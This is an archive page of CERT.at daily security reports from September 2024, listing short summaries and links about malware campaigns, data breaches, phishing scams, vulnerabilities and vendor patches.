missbrauchen, um ihre Rechte auszuweiten und Treiber zu installieren (CVE-2024-7479, CVE-2024-7481; beide CVSS 8.8, Risiko "hoch"). [..] Die seit Dienstag dieser Woche verfügbare Version 15.58.4 oder neuere schließen diese Sicherheitslücken. --------------------------------------------- https://heise.de/-9953034 ∗∗∗ XenServer and Citrix Hypervisor Security Update for CVE-2024-45817 ∗∗∗ --------------------------------------------- https://support.citrix.com/s/article/CTX691646-xenserver-and-citrix-hypervi… ∗∗∗ Schwachstelle in BlackBerry CylanceOPTICS Windows Installer Package ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/schwachstelle-in-blac… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.09.2024
by Daily end-of-shift report 24 Sep '24

24 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Montag 23-09-2024 18:00 − Dienstag 24-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hackerangriff hier, Hackerangriff da? Nein. ∗∗∗ --------------------------------------------- Ein Kommentar zur aktuellen Berichterstattung rund um DDoS-Angriffe gegen die Webseiten politischer Parteien in Österreich. --------------------------------------------- https://datenrausch.substack.com/p/hackerangriff-hier-hackerangriff ∗∗∗ New Mallox ransomware Linux variant based on leaked Kryptina code ∗∗∗ --------------------------------------------- An affiliate of the Mallox ransomware operation, also known as TargetCompany, was spotted using a slightly modified version of the Kryptina ransomware to attack Linux systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-mallox-ransomware-linux-… ∗∗∗ New Octo Android malware version impersonates NordVPN, Google Chrome ∗∗∗ --------------------------------------------- A new version of the Octo Android malware, named "Octo2," has been seen spreading across Europe under the guise of NordVPN, Google Chrome, and an app called Europe Enterprise. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-octo-android-malware-ver… ∗∗∗ Exploitation of RAISECOM Gateway Devices Vulnerability CVE-2024-7120, (Tue, Sep 24th) ∗∗∗ --------------------------------------------- Late in July, a researcher using the alias "NETSECFISH" published a blog post revealing a vulnerability in RASIECOM gateway devices [1]. The vulnerability affects the "vpn/list_base_Config.php" endpoint and allows for unauthenticated remote code execution. According to Shodan, about 25,000 vulnerable devices are exposed to the internet. With a simple proof of concept available, it is no surprise that we aseethe vulnerability exploited. --------------------------------------------- https://isc.sans.edu/diary/rss/31292 ∗∗∗ Untersuchung von Solaris / SunOS - Persistenz mit Systemprozessen ∗∗∗ --------------------------------------------- Im Vergleich zu Windows oder sogar Linux ist das öffentliche Wissen und die Anleitung zur digitalen Forensik für Solaris / SunOS eher dünn. Während dieses Einsatzes haben wir unser Wissen über Solaris erheblich erweitert und es auf verschiedene Angreifertechniken hin untersucht. In diesem Blog-Beitrag möchten wir unsere Erfahrungen mit der Untersuchung potenzieller Persistenz durch Systemprozesse im Zusammenhang mit der MITRE ATT&CK-Technik T1543 teilen. --------------------------------------------- https://sec-consult.com/de/blog/detail/investigating-solaris-sunos-persiste… ∗∗∗ Deloitte Says No Threat to Sensitive Data After Hacker Claims Server Breach ∗∗∗ --------------------------------------------- A notorious hacker has announced the theft of data from an improperly protected server allegedly belonging to Deloitte. {..] Deloitte says no sensitive data exposed after a notorious hacker leaked what he claimed to be internal communications. --------------------------------------------- https://www.securityweek.com/deloitte-says-no-threat-to-sensitive-data-afte… ∗∗∗ Kirchenaustritt nicht über kirchenaustritt-digital-beantragen.at beantragen ∗∗∗ --------------------------------------------- Wer Informationen zum Kirchenaustritt sucht, landet schnell bei kirchenaustritt-digital-beantragen.at. Wir raten jedoch davon ab, über diesen kostenpflichtigen Dienst den Austritt zu beantragen. Beschwerden zufolge wird die Kündigung trotz Bezahlung nicht an die Kirche übermittelt. Außerdem werden sehr viele Daten und eine Ausweiskopie verlangt. Wir raten generell davon ab, Kündigungen usw. über Drittanbieter abzuwickeln. --------------------------------------------- https://www.watchlist-internet.at/news/kirchenaustritt/ ∗∗∗ Inside SnipBot: The Latest RomCom Malware Variant ∗∗∗ --------------------------------------------- We deconstruct SnipBot, a variant of RomCom malware. Its authors, who target diverse sectors, seem to be aiming for espionage instead of financial gain. --------------------------------------------- https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/ ∗∗∗ Hacker Leaks 12,000 Alleged Twilio Call Records with Audio Recordings ∗∗∗ --------------------------------------------- A hacker has leaked 12,000 alleged Twilio call records, including phone numbers and audio recordings. The breach exposes personal data, creating significant privacy risks for businesses and individuals using the service. --------------------------------------------- https://hackread.com/hacker-leaks-twilio-call-records-audio-recordings/ ===================== = Vulnerabilities = ===================== ∗∗∗ Unpatched Vulnerabilities Expose Riello UPSs to Hacking: Security Firm ∗∗∗ --------------------------------------------- Hackers can take control of Riello UPS devices by exploiting vulnerabilities that likely remain unpatched, according to CyberDanube, an Austria-based firm specializing in industrial cybersecurity. --------------------------------------------- https://www.securityweek.com/unpatched-vulnerabilities-expose-riello-upss-t… ∗∗∗ CISA Releases Eight Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- ICSA-24-268-01 OPW Fuel Management Systems SiteSentinel, ICSA-24-268-02 Alisonic Sibylla, ICSA-24-268-03 Franklin Fueling Systems TS-550 EVO, ICSA-24-268-04 Dover Fueling Solutions ProGauge MAGLINK LX CONSOLE, ICSA-24-268-05 Moxa MXview One, ICSA-24-268-06 OMNTEC Proteus Tank Monitoring, ICSA-24-156-01 Uniview NVR301-04S2-P4 (Update A), ICSA-19-274-01 Interpeak IPnet TCP/IP Stack (Update E) --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/24/cisa-releases-eight-indu… ∗∗∗ Zyxel security advisory for post-authentication memory corruption vulnerabilities in some DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router versions ∗∗∗ --------------------------------------------- Zyxel has released patches for some DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router versions affected by post-authentication memory corruption vulnerabilities. Users are advised to install them for optimal protection. (CVE-2024-38266 CVE-2024-38267 CVE-2024-38268 CVE-2024-38269) --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Critical Vulnerabilities Discovered in Automated Tank Gauge Systems ∗∗∗ --------------------------------------------- In this blogpost, we will explore the ATG systems, their inherent risk when exposed to the Internet and the several critical vulnerabilities uncovered by Bitsight TRACE. By understanding these vulnerabilities, we hope that the reader can better appreciate the urgent need for enhanced security measures and the steps that need to be taken to protect these systems from exploitation. --------------------------------------------- https://www.bitsight.com/blog/critical-vulnerabilities-discovered-automated… ∗∗∗ Xen Security Advisory CVE-2024-45817 / XSA-462 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-462.html ∗∗∗ Keycloak Security Update Advisory (CVE-2024-8698) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/83325/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.09.2024
by Daily end-of-shift report 23 Sep '24

23 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 20-09-2024 18:00 − Montag 23-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hyper-V und VMware: Schwachstellen, Patches, PoCs ∗∗∗ --------------------------------------------- In Hyper-V wurde kürzlich eine Schwachstelle gepatcht – jetzt gibt es einen Proof of Concept (PoC) für diese Schwachstelle. Und bei VMware gibt es ebenfalls Schwachstellen sowie Infos, wie sich aus der VM ausbrechen lässt. --------------------------------------------- https://www.borncity.com/blog/2024/09/23/hyper-v-und-vmware-schwachstellen-… ∗∗∗ Android malware Necro infects 11 million devices via Google Play ∗∗∗ --------------------------------------------- A new version of the Necro Trojan malware for Android was installed on 11 million devices through Google Play in malicious SDK supply chain attacks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/android-malware-necro-infect… ∗∗∗ Global infostealer malware operation targets crypto users, gamers ∗∗∗ --------------------------------------------- A massive infostealer malware operation encompassing thirty campaigns targeting a broad spectrum of demographics and system platforms has been uncovered, attributed to a cybercriminal group named "Marko Polo." --------------------------------------------- https://www.bleepingcomputer.com/news/security/global-infostealer-malware-o… ∗∗∗ Phishing links with @ sign and the need for effective security awareness building, (Mon, Sep 23rd) ∗∗∗ --------------------------------------------- While going over a batch of phishing e-mails that were delivered to us here at the Internet Storm Center during the first half of September, I noticed one message which was somewhat unusual. Not because it was untypically sophisticated or because it used some completely new technique, but rather because its authors took advantage of one of the less commonly misused aspects of the URI format – the ability to specify information about a user in the URI before its "host" part (domain or IP address). --------------------------------------------- https://isc.sans.edu/diary/rss/31288 ∗∗∗ Staying a Step Ahead: Mitigating the DPRK IT Worker Threat ∗∗∗ --------------------------------------------- This report aims to increase awareness of the DPRK's efforts to obtain employment as IT workers and shed light on their operational tactics for obtaining employment and maintaining access to corporate systems. Understanding these methods can help organizations better detect these sorts of suspicious behaviors earlier in the hiring process. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it… ∗∗∗ Why Do Criminals Love Phishing-as-a-Service Platforms? ∗∗∗ --------------------------------------------- Phishing-as-a-Service (PaaS) platforms have become the go-to tool for cybercriminals, to launch sophisticated phishing campaigns targeting the general public and businesses, especially in the financial services sector. [..] In this blog, we’ll explore the key features offered by PaaS platforms, highlight the major platforms Trustwave SpiderLabs has recently observed, and cover effective phishing mitigation strategies. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/why-do-crim… ∗∗∗ CISA boss: Makers of insecure software are enablers of the real villains ∗∗∗ --------------------------------------------- Software suppliers who ship buggy, insecure code are the true baddies in the cyber crime story, Jen Easterly, boss of the US government's Cybersecurity and Infrastructure Security Agency, has argued. "The truth is: Technology vendors are the characters who are building problems" into their products, which then "open the doors for villains to attack their victims," declared Easterly during a Wednesday keynote address at Mandiant's mWise conference. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/09/20/cisa_sloppy_… ∗∗∗ Proxy Detection: Comparing Detection Services with the Truth ∗∗∗ --------------------------------------------- In our previous blog post, we looked at different (free and paid) solutions to detect the use of anonymity tools during attacks executed on our Remote Desktop Protocol (RDP) honeypots. Confronted with inconclusive outcomes, this blog post aims to evaluate the different proxy detector tools by analyzing their results with our dataset of Truth. --------------------------------------------- https://gosecure.ai/blog/2024/09/23/proxy-detection-comparing-detection-ser… ∗∗∗ Hackers Claim Second Dell Data Breach in One Week ∗∗∗ --------------------------------------------- Hackers claim a second Dell data breach within a week, exposing sensitive internal files via compromised Atlassian tools. Allegedly, data from Jira, Jenkins, and Confluence was leaked. Dell is already investigating the first incident. --------------------------------------------- https://hackread.com/dell-hit-by-second-security-breach-in-week/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (expat, fence-agents, firefox, libnbd, openssl, pcp, ruby:3.3, and thunderbird), Debian (ruby-saml), Fedora (aardvark-dns, chromium, expat, jupyterlab, less, openssl, python-jupyterlab-server, python-notebook, python3-docs, and python3.12), Gentoo (calibre, curl, Emacs, org-mode, Exo, file, GPL Ghostscript, gst-plugins-good, liblouis, Mbed TLS, OpenVPN, Oracle VirtualBox, PJSIP, Portage, PostgreSQL, pypy, pypy3, Rust, Slurm, stb, VLC, and Xen), SUSE (container-suseconnect, ffmpeg-4, kernel, libpcap, python3, python310, python36, and wpa_supplicant), and Ubuntu (firefox, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-azure, and linux-ibm-5.15, linux-oracle-5.15). --------------------------------------------- https://lwn.net/Articles/991377/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.09.2024
by Daily end-of-shift report 20 Sep '24

20 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 19-09-2024 18:00 − Freitag 20-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Ever wonder how crooks get the credentials to unlock stolen phones? ∗∗∗ --------------------------------------------- iServer provided a simple service for phishing credentials to unlock phones. --------------------------------------------- https://arstechnica.com/?p=2051165 ∗∗∗ CISA warns of actively exploited Apache HugeGraph-Server bug ∗∗∗ --------------------------------------------- The U.S. Cybersecurity and Infrastructure Agency (CISA) has added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, among which is a remote code execution (RCE) flaw impacting Apache HugeGraph-Server. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-explo… ∗∗∗ macOS Sequoia change breaks networking for VPN, antivirus software ∗∗∗ --------------------------------------------- Users of macOS 15 Sequoia are reporting network connection errors when using certain endpoint detection and response (EDR) or virtual private network (VPN) solutions, and web browsers. --------------------------------------------- https://www.bleepingcomputer.com/news/apple/macos-sequoia-change-breaks-net… ∗∗∗ 1 In 10 Orgs Dumping Their Security Vendors After CrowdStrike Outage ∗∗∗ --------------------------------------------- An anonymous reader quotes a report from The Register: Germanys Federal Office for Information Security (BSI) says one in ten organizations in the country affected by CrowdStrikes outage in July are dropping their current vendors products. Four percent of organizations have already abandoned their existing solutions, while a further 6 percent plan to .. --------------------------------------------- https://it.slashdot.org/story/24/09/19/1721236/1-in-10-orgs-dumping-their-s… ∗∗∗ SAP Hash Cracking Techniques ∗∗∗ --------------------------------------------- Hashing is a one-way encryption technique employed to ensure data integrity, authenticate information, and secure passwords alongside other sensitive data. Hash functions convert input data into a fixed-size string of characters that are both uniform and deterministic, making them an excellent choice for maintaining data security. --------------------------------------------- https://redrays.io/blog/sap-hash-cracking-techniques/ ∗∗∗ This Windows PowerShell Phish Has Scary Potential ∗∗∗ --------------------------------------------- Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While its unlikely that many programmers fell for this .. --------------------------------------------- https://krebsonsecurity.com/2024/09/this-windows-powershell-phish-has-scary… ∗∗∗ Ivanti Warns of Second CSA Vulnerability Exploited in Attacks ∗∗∗ --------------------------------------------- In addition to the Ivanti CSA flaw CVE-2024-8190, another vulnerability affecting the same product, tracked as CVE-2024-8963, has been exploited. --------------------------------------------- https://www.securityweek.com/ivanti-warns-of-second-csa-vulnerability-explo… ∗∗∗ Noise Storms: Massive Amounts of Spoofed Web Traffic Linked to China ∗∗∗ --------------------------------------------- GreyNoise has observed millions of spoofed IPs flooding internet providers with web traffic primarily focusing on TCP connections. --------------------------------------------- https://www.securityweek.com/noise-storms-massive-amounts-of-spoofed-web-tr… ∗∗∗ Vorsicht vor gefälschten Gewinnspielen von ÖAMTC und ADAC ∗∗∗ --------------------------------------------- Vorsicht, wenn Sie per E-Mail ein Gewinnspiel für ein Auto-Notfallset erhalten. Kriminelle geben sich als ÖAMTC oder ADAC aus und behaupten, Sie hätten ein Auto-Notfallset gewonnen. Klicken Sie nicht auf den Link, Sie werden in eine Abo-Fall gelockt! --------------------------------------------- https://www.watchlist-internet.at/news/gefaelschte-gewinnspiele-oeamtc-adac/ ∗∗∗ Datendiebstahl via Slack, Disney stellt Nutzung des Messenger-Dienstes ein ∗∗∗ --------------------------------------------- Die Hackergruppe Nullbulge konnte Computercode und Details über unveröffentlichte Projekte stehlen und veröffentlichen --------------------------------------------- https://www.derstandard.at/story/3000000237370/datendiebstahl-disney-trennt… ∗∗∗ High-risk vulnerabilities in common enterprise technologies ∗∗∗ --------------------------------------------- Rapid7 is warning customers about high-risk vulnerabilities in Adobe ColdFusion, Broadcom VMware vCenter Server, and Ivanti Endpoint Manager (EPM). These CVEs are likely attack targets for APT and/or financially motivated adversaries. --------------------------------------------- https://www.rapid7.com/blog/post/2024/09/19/etr-high-risk-vulnerabilities-i… ∗∗∗ Jugendherbergen offenbar Opfer von Ransomware-Bande Hunters ∗∗∗ --------------------------------------------- Ende August kam es zu Störungen bei rund 450 deutschen Jugendherbergen. Die Ursache war unklar. Offenbar ist eine Ransomware-Attacke schuld. --------------------------------------------- https://heise.de/-9938226 ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5773-1 chromium - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00186.html ∗∗∗ OpenSSH 9.9 released ∗∗∗ --------------------------------------------- https://lwn.net/Articles/991028/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.09.2024
by Daily end-of-shift report 19 Sep '24

19 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 18-09-2024 18:00 − Donnerstag 19-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Clever GitHub Scanner campaign abusing repos to push malware ∗∗∗ --------------------------------------------- A clever threat campaign is abusing GitHub repositories to distribute the Lumma Stealer password-stealing malware targeting users who frequent an open source project repository or are subscribed to email notifications from it. [..] The domain, github-scanner[.]com is not affiliated with GitHub and is being used to deliver malware to visitors. --------------------------------------------- https://www.bleepingcomputer.com/news/security/clever-github-scanner-campai… ∗∗∗ Sicherheitsexperte: Müssen uns nicht vor explodierenden Handys fürchten ∗∗∗ --------------------------------------------- Nach Explosionswellen im Libanon sorgen sich manche nun um die eigenen Smartphones. Cyberexperte Joe Pichelmayr sieht da aber wenig Gefahr. --------------------------------------------- https://futurezone.at/digital-life/sicherheitsexperte-handys-smartphone-exp… ∗∗∗ Google Cloud Document AI flaw (still) allows data theft despite bounty payout ∗∗∗ --------------------------------------------- Overly permissive settings in Google Cloud's Document AI service could be abused by data thieves to break into Cloud Storage buckets and steal sensitive information. [..] A Google spokesperson has told us in response to the above: [..] We developed a fix and are actively working to roll it out. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/09/17/google_cloud… ∗∗∗ Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware ∗∗∗ --------------------------------------------- In this blog, we’ll examine the mechanics of AsyncRAT, how it spreads by masquerading as cracked software, and the steps you can take to protect yourself from this increasingly common cyber threat. --------------------------------------------- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cracked-software-or-cy… ∗∗∗ Solar Cybersecurity And The Nuances Of Renewable Energy Integration ∗∗∗ --------------------------------------------- The modern age of renewable energy has seen a surge in solar panels and wind turbines. While these systems enhance sustainability, their digital technologies carry risks. Cybersecurity professionals must know the relevant nuances when integrating renewable systems. --------------------------------------------- https://www.tripwire.com/state-of-security/solar-cybersecurity-and-nuances-… ∗∗∗ Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool ∗∗∗ --------------------------------------------- Discover Splinter, a new post-exploitation tool with advanced features like command execution and file manipulation, detected by Unit 42 researchers. --------------------------------------------- https://unit42.paloaltonetworks.com/analysis-pentest-tool-splinter/ ∗∗∗ Betrugsfall mit tegut teo-App und fiktiver Mitarbeiternummer ∗∗∗ --------------------------------------------- Im Prozess sagte der Angeklagte: "Ich war zu der Zeit arbeitslos. Für die Märkte gibt es eine App und da konnte man bei Bezahlungsmitteln die Mitarbeiternummer als Karte hinterlegen. Ich habe es einfach mit einer zufälligen Zahl probiert, und es hat direkt geklappt. --------------------------------------------- https://www.borncity.com/blog/2024/09/19/betrugsfall-mit-tegut-teo-app-und-… ∗∗∗ Aktuelle Phishing-Masche: Terminwunsch für Telefonat mit angeblicher Sparkasse ∗∗∗ --------------------------------------------- Die Verbraucherzentrale NRW warnt vor einer aktuellen Phishing-Masche. Angeblich will die Sparkasse einen Termin für ein Telefonat. --------------------------------------------- https://heise.de/-9909574 ∗∗∗ Discord startet Ende-zu-Ende-Verschlüsselung für Audio- und Video-Chats ∗∗∗ --------------------------------------------- Um die Privatsphäre zu wahren, verschlüsselt der Onlinedienst Discord ab sofort bestimmte Formen des Nachrichtenaustauschs Ende-zu-Ende. --------------------------------------------- https://heise.de/-9909594 ===================== = Vulnerabilities = ===================== ∗∗∗ VU#138043: A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server ∗∗∗ --------------------------------------------- CVE-2024-7490 There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution. --------------------------------------------- https://kb.cert.org/vuls/id/138043 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (expat and tinyproxy), Fedora (frr, microcode_ctl, python3.10, python3.12, python3.6, and ruby), Oracle (expat, fence-agents, firefox, ghostscript, java-1.8.0-openjdk, kernel, and thunderbird), Red Hat (firefox, openssl, ruby:3.3, and thunderbird), SUSE (clamav, ffmpeg-4, kernel, libmfx, python3, python312, runc, ucode-intel, and wireshark), and Ubuntu (apache2, git, linux, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-nvidia, linux-oracle, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, and linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle). --------------------------------------------- https://lwn.net/Articles/990877/ ∗∗∗ GitLab Patches Critical Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- GitLab has patched a critical-severity SAML authentication bypass affecting both Community Edition (CE) and Enterprise Edition (EE) instances. [..] The issue, tracked as CVE-2024-45409 (CVSS score of 10/10), only affects GitLab CE/EE instances that have been configured to use SAML-based authentication. --------------------------------------------- https://www.securityweek.com/gitlab-patches-critical-authentication-bypass-… ∗∗∗ DSA-5772-1 libreoffice - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00185.html ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (September 9, 2024 to September 15, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/09/wordfence-intelligence-weekly-wordpr… ∗∗∗ MegaSys Computer Technologies Telenium Online Web Application ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-04 ∗∗∗ IDEC PLCs ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-02 ∗∗∗ Kastle Systems Access Control System ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-05 ∗∗∗ IDEC CORPORATION WindLDR and WindO/I-NV4 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-03 ∗∗∗ Rockwell Automation RSLogix 5 and RSLogix 500 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.09.2024
by Daily end-of-shift report 18 Sep '24

18 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 17-09-2024 18:00 − Mittwoch 18-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Construction firms breached in brute force attacks on accounting software ∗∗∗ --------------------------------------------- Hackers are brute-forcing passwords for highly privileged accounts on exposed Foundation accounting servers, widely used in the construction industry, to breach corporate networks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/construction-firms-breached-… ∗∗∗ Temu denies breach after hacker claims theft of 87 million data records ∗∗∗ --------------------------------------------- Temu denies it was hacked or suffered a data breach after a threat actor claimed to be selling a stolen database containing 87 million records of customer information. --------------------------------------------- https://www.bleepingcomputer.com/news/security/temu-denies-breach-after-hac… ∗∗∗ Sandbox scores are not an antivirus replacement ∗∗∗ --------------------------------------------- Automatic sandbox services should not be treated like "antivirus scanners" to determine maliciousness for samples. That’s not their intended use, and they perform poorly in that role. Unfortunately, providing an "overall score" or "verdict" is misleading. --------------------------------------------- https://www.gdatasoftware.com/blog/2024/09/38031-sandbox-scores-are-not-an-… ∗∗∗ Vanir Locker: Deutsche Polizei übernimmt Tor-Seite einer Hackergruppe ∗∗∗ --------------------------------------------- Wer die Datenleckseite der Ransomwaregruppe Vanir Locker aufruft, findet dort nun eine Meldung des LKA vor. Die Seite wurde beschlagnahmt. --------------------------------------------- https://www.golem.de/news/lka-baden-wuerttemberg-polizei-uebernimmt-leak-se… ∗∗∗ Python Infostealer Patching Windows Exodus App, (Wed, Sep 18th) ∗∗∗ --------------------------------------------- A few months ago, I wrote a diary about a Python script that replaced the Exodus[2] Wallet app with a rogue one on macOS. Infostealers are everywhere these days. They target mainly browsers (cookies, credentials) and classic applications that may handle sensitive information. Cryptocurrency wallets are another category of applications .. --------------------------------------------- https://isc.sans.edu/forums/diary/Python+Infostealer+Patching+Windows+Exodu… ∗∗∗ VMware patches remote make-me-root holes in vCenter Server, Cloud Foundation ∗∗∗ --------------------------------------------- Bug reports made in China Broadcom has emitted a pair of patches for vulnerabilities in VMware vCenter Server that a miscreant with network access to the software could exploit to completely commandeer a system. This also affects Cloud Foundation. --------------------------------------------- https://www.theregister.com/2024/09/17/vmware_vcenter_patch/ ∗∗∗ Australian Police conducted supply chain attack on criminal collaborationware ∗∗∗ --------------------------------------------- Sting led to cuffing of alleged operator behind Ghost – an app for drug trafficking, money laundering, and violence-as-a-service Australias Federal Police (AFP) yesterday arrested and charged a man with creating and administering an app named Ghost that was allegedly "a dedicated encrypted communication platform … built solely for the criminal underworld" and .. --------------------------------------------- https://www.theregister.com/2024/09/18/afp_operation_kraken_ghost_crimeware… ∗∗∗ Did a Chinese University Hacking Competition Target a Real Victim? ∗∗∗ --------------------------------------------- Participants in a hacking competition with ties to China’s military were, unusually, required to keep their activities secret, but security researchers say the mystery only gets stranger from there. --------------------------------------------- https://www.wired.com/story/china-hacking-competition-real-victim/ ∗∗∗ Scam ‘Funeral Streaming’ Groups Thrive on Facebook ∗∗∗ --------------------------------------------- Scammers are flooding Facebook with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any .. --------------------------------------------- https://krebsonsecurity.com/2024/09/scam-funeral-streaming-groups-thrive-on… ∗∗∗ Russian Security Firm Doctor Web Hacked ∗∗∗ --------------------------------------------- Antimalware company Doctor Web was recently targeted in a cyberattack that prompted it to disconnect all resources from its networks. --------------------------------------------- https://www.securityweek.com/russian-security-firm-doctor-web-discloses-tar… ∗∗∗ North Korean Hackers Lure Critical Infrastructure Employees With Fake Jobs ∗∗∗ --------------------------------------------- A North Korean group tracked as UNC2970 has been spotted trying to deliver new malware to people in the aerospace and energy industries. --------------------------------------------- https://www.securityweek.com/north-korean-hackers-lure-critical-infrastruct… ∗∗∗ Cyber threats to shipping explained ∗∗∗ --------------------------------------------- TL;DR Modern vessels are becoming increasingly connected. While it is unlikely that hackers could fully control a container ship remotely, they may be able to disrupt systems such as the […]The post Cyber threats to shipping explained first appeared on Pen Test Partners. --------------------------------------------- https://www.pentestpartners.com/security-blog/cyber-threats-to-shipping-exp… ∗∗∗ Vulnerabilities in Cellular Packet Cores Part IV: Authentication ∗∗∗ --------------------------------------------- Our research reveals two significant vulnerabilities in Microsoft Azure Private 5G Core (AP5GC). The first vulnerability (CVE-2024-20685) allows a crafted signaling message to crash the control plane, leading to potential service outages. The second (ZDI-CAN-23960) disconnects and replaces attached base stations, disrupting network operations. While these .. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/i/vulnerabilities-in-cellular-… ∗∗∗ RAMBO Attack: Electromagnetic Waves Steal Data from Air-Gapped Systems ∗∗∗ --------------------------------------------- Air-gapped systems, once considered immune to attacks, are now vulnerable. Learn about a groundbreaking new method that .. --------------------------------------------- https://hackread.com/rambo-attack-electromagnetic-waves-data-air-gapped-sys… ∗∗∗ CISA KEV performance in the Financial Sector ∗∗∗ --------------------------------------------- I’ve had a number of requests to examine the finance sector in more detail including breakdowns of exactly what kind of financial organizations are experiencing greater risk and who is remediating more quickly. Heres some answers. --------------------------------------------- https://www.bitsight.com/blog/cisa-kev-performance-financial-sector ===================== = Vulnerabilities = ===================== ∗∗∗ Multiple vulnerabilities in WordPress plugin "Welcart e-Commerce" ∗∗∗ --------------------------------------------- WordPress plugin "Welcart e-Commerce" provided by Welcart Inc. contains multiple vulnerabilities. --------------------------------------------- https://jvn.jp/en/jp/JVN19766555/ ∗∗∗ Apple Releases Security Updates for Multiple Products ∗∗∗ --------------------------------------------- Apple released security updates to address vulnerabilities in multiple Apple products. A cyber threat actor could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the following .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/18/apple-releases-security-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.09.2024
by Daily end-of-shift report 17 Sep '24

17 Sep '24

